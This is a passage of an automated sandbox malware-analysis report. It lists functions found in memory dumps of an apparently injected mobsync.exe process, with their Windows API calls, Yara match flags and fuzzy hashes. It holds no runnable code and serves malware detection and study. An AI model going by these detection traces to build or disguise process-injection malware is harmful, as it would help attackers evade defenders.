                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 007F46F2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 335b9d072062c93c8d5841efebb952b058b4076accb46d6834c6a2a97a5bff61
                                                                    • Instruction ID: 5bf3674d21c85dd01fb42aa8433c1d12812b48ad19aed1504842def0af18987e
                                                                    • Opcode Fuzzy Hash: 335b9d072062c93c8d5841efebb952b058b4076accb46d6834c6a2a97a5bff61
                                                                    • Instruction Fuzzy Hash: CB0112B6E0020DA7DB10EBA4DC42FAEB378AB54308F004295AA09D7281F635EB148B52
                                                                    Function 00809800 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,007F8414,00000010,?,?,?,00000044,?,00000010,007F8414,?,00000000,?), ref: 0080985D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 4d52db16253917bd74d5aecb03740b25dbf256a6284b3af76faf9b015384252b
                                                                    • Instruction ID: ef909e1949cfbcb09e894122ba3473081f7f3f39919f1fced52e50d6dca87fda
                                                                    • Opcode Fuzzy Hash: 4d52db16253917bd74d5aecb03740b25dbf256a6284b3af76faf9b015384252b
                                                                    • Instruction Fuzzy Hash: AA0180B2214648BBCB44DE89DC85EDB77ADEF8C754F418108FA19E3241D630F8518BA8
                                                                    Function 007F4675 Relevance: 1.5, APIs: 1, Instructions: 40libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 007F46F2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 6d77bacdb1d3529f7168cc01b32e97690413d3805374c4ced6db3b9f3292659f
                                                                    • Instruction ID: aec8fb0beefff8027804e89c5ed410f5e84b7b6f4a65e8088aed2dd3ce94cd5c
                                                                    • Opcode Fuzzy Hash: 6d77bacdb1d3529f7168cc01b32e97690413d3805374c4ced6db3b9f3292659f
                                                                    • Instruction Fuzzy Hash: FCF0C27A90020EABEB10CF94CD82FEDB7B4EB58718F004295E90DD7241F230AA05CB51
                                                                    Function 007E9B50 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 007E9B92
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: c7fef2e1aeec5384199b543baa2663bb42d1580a9be687e23c33e5d82f05d811
                                                                    • Instruction ID: 19c98dcdd1e1a50ef1e173561e46a1d442dd887efbc0b90018e6effc3bfa3ba9
                                                                    • Opcode Fuzzy Hash: c7fef2e1aeec5384199b543baa2663bb42d1580a9be687e23c33e5d82f05d811
                                                                    • Instruction Fuzzy Hash: 21F0307339131436E22066AA9C03FDB739CDB84775F150465F70CEA1C0D996B50142A5
                                                                    Function 007E9B4E Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 007E9B92
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: dd597cb93ad9b51013a6a9a88c4a1f1cdc1c55ea00c7d57aa31480ea6b0119f5
                                                                    • Instruction ID: 5d0399db6978b877cc6a72366ea98a66a2d6b00972bc9ee43769ef0eb3f664d3
                                                                    • Opcode Fuzzy Hash: dd597cb93ad9b51013a6a9a88c4a1f1cdc1c55ea00c7d57aa31480ea6b0119f5
                                                                    • Instruction Fuzzy Hash: A2E09A7328131032E230A6AA8C07FDB629CDF84B61F250019F708EB2C0D9A6FA0082A5
                                                                    Function 007F8450 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 007F847A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 3fd5b365d8c194748c036931a38856c4ce100155dacc9760787567bc26b865f6
                                                                    • Instruction ID: ae295cda018863e72a6304fa64aa9af84670346e43fb588802bc9fcd2db549c2
                                                                    • Opcode Fuzzy Hash: 3fd5b365d8c194748c036931a38856c4ce100155dacc9760787567bc26b865f6
                                                                    • Instruction Fuzzy Hash: 79E0867124030927FB94ABA89C4AFB6335C9B48764F1C4650BA1CDF3C2EA78F9518195
                                                                    Function 007F8250 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,007F1E90,0080800F,008056CF,007F1E60), ref: 007F8281
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 2b300ccd0162b9e820a6cc7e5343138c6d1829e4dcc409e428e07b39aeb17a52
                                                                    • Instruction ID: 396e6f475863b9caa6a5c2138c951df0daf31771abc877e47a3bee9fdd656cd6
                                                                    • Opcode Fuzzy Hash: 2b300ccd0162b9e820a6cc7e5343138c6d1829e4dcc409e428e07b39aeb17a52
                                                                    • Instruction Fuzzy Hash: D2D05E727803047BFA80A7A59C4BFA6328CAB04794F494064FA0CEB3C2ED65F51041A6
                                                                    Function 04A62C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 671ff3d3f9e7eb6a5cd0a7048bbe08df667d3eab926c34e2052af408aa7e4ff1
                                                                    • Instruction ID: 9fe34480da99196c8704485aa94d9841639b87431cafce068f29c49d7765eef4
                                                                    • Opcode Fuzzy Hash: 671ff3d3f9e7eb6a5cd0a7048bbe08df667d3eab926c34e2052af408aa7e4ff1
                                                                    • Instruction Fuzzy Hash: 9CB09B739015C5C9FB11F7604A0C71779006BD0705F56C075D2030641E473CD5D1E175
                                                                    Function 007FF68C Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Uninitialize
                                                                    • String ID:
                                                                    • API String ID: 3861434553-0
                                                                    • Opcode ID: fa1758c9754267f48b82239a4b1aa6b0fb04c7b0a270c5ccd22beb80c5ef9052
                                                                    • Instruction ID: f4649db3fee9f46fb31e356f86e80dfbbab571ad242ed9fe61df26c1a66ff45c
                                                                    • Opcode Fuzzy Hash: fa1758c9754267f48b82239a4b1aa6b0fb04c7b0a270c5ccd22beb80c5ef9052
                                                                    • Instruction Fuzzy Hash: 58F0683260021D67DB10EAEDDC81FAAB76CFF44758F140165FA0CD7281EE56A91546E1